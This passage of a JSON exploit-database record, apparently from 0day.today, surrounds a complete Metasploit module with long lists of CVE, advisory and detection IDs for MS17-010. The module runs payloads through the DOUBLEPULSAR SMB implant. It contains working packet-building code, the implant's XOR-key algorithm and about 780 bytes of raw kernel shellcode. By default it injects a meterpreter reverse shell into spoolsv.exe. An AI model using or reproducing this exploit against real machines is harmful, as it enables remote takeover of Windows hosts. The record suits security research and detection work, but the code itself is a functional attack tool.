"AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", 
"1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:17:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-08T00:17:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-09] #"}, "lastseen": "2021-10-08T22:18:55", "differentElements": ["sourceData"], "edition": 39}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "fe27bd38f18a25429831e49bd989ffaa", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-09T22:23:13", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", 
"1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
